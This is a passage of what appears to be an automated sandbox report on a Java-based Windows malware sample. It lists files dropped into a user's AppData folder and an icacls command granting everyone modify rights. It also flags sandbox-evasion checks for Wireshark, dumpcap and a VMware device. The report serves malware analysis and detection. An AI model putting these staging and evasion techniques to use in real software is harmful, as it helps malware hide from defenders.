          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\vcruntime140.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcr100.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | File created: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\ucrtbase.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcr100.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | File created: C:\Users\user\AppData\Local\Temp\sqlite-3.8.11.2-42eaffe0-b8ea-4880-ab72-6ea9a41a3e14-sqlitejdbc.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\concrt140.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | File created: C:\Users\user\AppData\Local\Temp\Windows9046764930049020633.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
          Source: C:\Windows\SysWOW64\wscript.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
          Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\regedit.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmp | Binary or memory string: SUPERANTISPYWARE.EXE
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmp | Binary or memory string: DUMPCAP.EXE
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmp | Binary or memory string: WIRESHARK.EXE
          Source: C:\Windows\SysWOW64\wscript.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\vcruntime140.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exeJump to dropped file
